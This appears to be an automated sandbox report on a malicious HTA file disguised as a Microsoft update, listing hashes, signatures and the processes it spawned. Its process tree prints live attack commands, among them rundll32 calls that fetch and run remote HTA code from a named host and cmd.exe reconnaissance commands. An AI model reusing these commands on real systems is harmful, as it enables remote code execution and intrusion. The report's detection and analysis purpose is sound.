Resubmissions
  25-06-2021 19:32   210625-6wc8e9cwj2   8
  17-01-2021 18:55   210117-eh6j4sptaa   10
  22-12-2020 13:14   201222-pnne3mqwlx   10

Analysis
  max time kernel: 20s
  max time network: 112s
  platform: windows10_x64
  resource: win10v20201028
  submitted: 17-01-2021 18:55
Static task: static1
Behavioral task: behavioral1 (Sample: MicrosoftUpdate.hta; Resource: win7v20201028)
Behavioral task: behavioral2 (Sample: MicrosoftUpdate.hta; Resource: win10v20201028)
General
  Target: MicrosoftUpdate.hta
  Size: 26KB
  MD5: 12cd7a34e347311c7f07b5b10adb1266
  SHA1: fc35180c4e3f0e95e02b163ddbd79ce4151e3ee4
  SHA256: 8e911752a92e891fd37232961a6d23e3af83f3ea015389a99df9cad6c9e3f869
  SHA512: 31e4558f4fa8e9adc1e288b025ad3085f89abf3a89bb6a3857cea773c25cd97efb01cb5e814dc6f91766042f7ce1f007e621b84f09500d3672d5828a584c0e38
Malware Config
Signatures
-
Blocklisted process makes network request (8 IoCs)
Processes:
  flow   pid    process
  11     860    mshta.exe
  12     1520   rundll32.exe
  13     1520   rundll32.exe
  14     1688   rundll32.exe
  15     1688   rundll32.exe
  16     3212   rundll32.exe
  17     1688   rundll32.exe
  18     3212   rundll32.exe
Script User-Agent (5 IoCs)
Uses user-agent string associated with script host/environment.
Processes:
  description               flow   ioc
  HTTP User-Agent header    18     Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
  HTTP User-Agent header    11     Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
  HTTP User-Agent header    13     Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
  HTTP User-Agent header    15     Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
  HTTP User-Agent header    17     Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Suspicious use of AdjustPrivilegeToken (54 IoCs)
Processes (the original table repeats each row 27 times; collapsed here):
  description                pid    process
  Token: SeDebugPrivilege    3128   whoami.exe
  Token: SeDebugPrivilege    2732   whoami.exe
Suspicious use of WriteProcessMemory (66 IoCs)
Processes (the original table lists each parent/target pair up to three times; collapsed here):
  pid    process         target pid   target process
  860    mshta.exe       2920         cmd.exe
  2920   cmd.exe         2928         chcp.com
  2920   cmd.exe         3128         whoami.exe
  860    mshta.exe       192          cmd.exe
  192    cmd.exe         940          chcp.com
  860    mshta.exe       516          cmd.exe
  516    cmd.exe         2716         chcp.com
  516    cmd.exe         3488         ROUTE.EXE
  860    mshta.exe       1520         rundll32.exe
  1520   rundll32.exe    2344         cmd.exe
  2344   cmd.exe         3164         chcp.com
  2344   cmd.exe         2732         whoami.exe
  1520   rundll32.exe    2924         cmd.exe
  2924   cmd.exe         2984         chcp.com
  1520   rundll32.exe    1956         cmd.exe
  1956   cmd.exe         4060         chcp.com
  1956   cmd.exe         4024         ROUTE.EXE
  1520   rundll32.exe    1688         rundll32.exe
  1688   rundll32.exe    3212         rundll32.exe
  3212   rundll32.exe    1300         cmd.exe
  1300   cmd.exe         3980         chcp.com
  1300   cmd.exe         3024         HOSTNAME.EXE
Processes (tree; indentation shows parent/child nesting, PIDs taken from the WriteProcessMemory table above)

C:\Windows\SysWOW64\mshta.exe (PID 860)
  command: C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\MicrosoftUpdate.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
  - Blocklisted process makes network request
  - Suspicious use of WriteProcessMemory

  C:\Windows\SysWOW64\cmd.exe (PID 2920)
    command: "C:\Windows\system32\cmd.exe" /q /c chcp 437 & whoami /all 1> C:\Users\Admin\AppData\Local\Temp\c7a5b0df-ef04-681d-1180-6fdcca6be03c.txt 2>&1
    - Suspicious use of WriteProcessMemory

    C:\Windows\SysWOW64\chcp.com (PID 2928)
      command: chcp 437

    C:\Windows\SysWOW64\whoami.exe (PID 3128)
      command: whoami /all
      - Suspicious use of AdjustPrivilegeToken

  C:\Windows\SysWOW64\cmd.exe (PID 192)
    command: "C:\Windows\system32\cmd.exe" /q /c chcp 437 & cd 1> C:\Users\Admin\AppData\Local\Temp\b6b608e3-2391-f49b-3c29-a4d7954fe3ae.txt 2>&1
    - Suspicious use of WriteProcessMemory

    C:\Windows\SysWOW64\chcp.com (PID 940)
      command: chcp 437

  C:\Windows\SysWOW64\cmd.exe (PID 516)
    command: "C:\Windows\system32\cmd.exe" /q /c chcp 437 & route PRINT 1> C:\Users\Admin\AppData\Local\Temp\d288a720-c85b-704c-c585-91a8468b1814.txt 2>&1
    - Suspicious use of WriteProcessMemory

    C:\Windows\SysWOW64\chcp.com (PID 2716)
      command: chcp 437

    C:\Windows\SysWOW64\ROUTE.EXE (PID 3488)
      command: route PRINT

  C:\Windows\SysWOW64\rundll32.exe (PID 1520)
    command: "C:\Windows\System32\rundll32.exe" http://hpsj.firewall-gateway.net:8080/MicrosoftUpdate?6MCQS7QNK9=849c0ca5ba1a4e34b50a86a8c092b973;U5AVOFNB6B=;\..\..\..\./mshtml,RunHTMLApplication
    - Blocklisted process makes network request
    - Suspicious use of WriteProcessMemory

    C:\Windows\SysWOW64\cmd.exe (PID 2344)
      command: "C:\Windows\system32\cmd.exe" /q /c chcp 437 & whoami /all 1> C:\Users\Admin\AppData\Local\Temp\2c3add2f-2e8e-d370-0e3a-b0a6a5c3059f.txt 2>&1
      - Suspicious use of WriteProcessMemory

      C:\Windows\SysWOW64\chcp.com (PID 3164)
        command: chcp 437

      C:\Windows\SysWOW64\whoami.exe (PID 2732)
        command: whoami /all
        - Suspicious use of AdjustPrivilegeToken

    C:\Windows\SysWOW64\cmd.exe (PID 2924)
      command: "C:\Windows\system32\cmd.exe" /q /c chcp 437 & cd 1> C:\Users\Admin\AppData\Local\Temp\f0d757f2-0e27-08cc-c0f3-a48209db0fb7.txt 2>&1
      - Suspicious use of WriteProcessMemory

      C:\Windows\SysWOW64\chcp.com (PID 2984)
        command: chcp 437

    C:\Windows\SysWOW64\cmd.exe (PID 1956)
      command: "C:\Windows\system32\cmd.exe" /q /c chcp 437 & route PRINT 1> C:\Users\Admin\AppData\Local\Temp\6c152063-30f4-caf6-e3a5-0cfb42823082.txt 2>&1
      - Suspicious use of WriteProcessMemory

      C:\Windows\SysWOW64\chcp.com (PID 4060)
        command: chcp 437

      C:\Windows\SysWOW64\ROUTE.EXE (PID 4024)
        command: route PRINT

    C:\Windows\SysWOW64\rundll32.exe (PID 1688)
      command: "C:\Windows\System32\rundll32.exe" http://hpsj.firewall-gateway.net:8080/MicrosoftUpdate?CGP42PEMTT=0c1a7106eae44312bfbf9dd352c260c9;EM58TMEAYG=;\..\..\..\./mshtml,RunHTMLApplication
      - Blocklisted process makes network request
      - Suspicious use of WriteProcessMemory

      C:\Windows\SysWOW64\rundll32.exe (PID 3212)
        command: "C:\Windows\System32\rundll32.exe" http://hpsj.firewall-gateway.net:8080/MicrosoftUpdate?CGP42PEMTT=0c1a7106eae44312bfbf9dd352c260c9;EM58TMEAYG=fc0ea65803ea476083c12cb4d33724aa;\..\..\..\./mshtml,RunHTMLApplication
        - Blocklisted process makes network request
        - Suspicious use of WriteProcessMemory

        C:\Windows\SysWOW64\cmd.exe (PID 1300)
          command: "C:\Windows\system32\cmd.exe" /q /c chcp 437 & hostname 1> C:\Users\Admin\AppData\Local\Temp\2e35ab70-3725-8c91-cca7-9d6c714ad986.txt 2>&1
          - Suspicious use of WriteProcessMemory

          C:\Windows\SysWOW64\chcp.com (PID 3980)
            command: chcp 437

          C:\Windows\SysWOW64\HOSTNAME.EXE (PID 3024)
            command: hostname
Network
MITRE ATT&CK Matrix
Downloads
Dropped files (the redirected output of the recon commands in the process tree; each pair below carries identical hashes in the report, so the two stages produced the same output):
  C:\Users\Admin\AppData\Local\Temp\c7a5b0df-ef04-681d-1180-6fdcca6be03c.txt and C:\Users\Admin\AppData\Local\Temp\2c3add2f-2e8e-d370-0e3a-b0a6a5c3059f.txt (whoami /all)
  C:\Users\Admin\AppData\Local\Temp\b6b608e3-2391-f49b-3c29-a4d7954fe3ae.txt and C:\Users\Admin\AppData\Local\Temp\f0d757f2-0e27-08cc-c0f3-a48209db0fb7.txt (cd)
  C:\Users\Admin\AppData\Local\Temp\d288a720-c85b-704c-c585-91a8468b1814.txt and C:\Users\Admin\AppData\Local\Temp\6c152063-30f4-caf6-e3a5-0cfb42823082.txt (route PRINT)
  C:\Users\Admin\AppData\Local\Temp\2e35ab70-3725-8c91-cca7-9d6c714ad986.txt (hostname)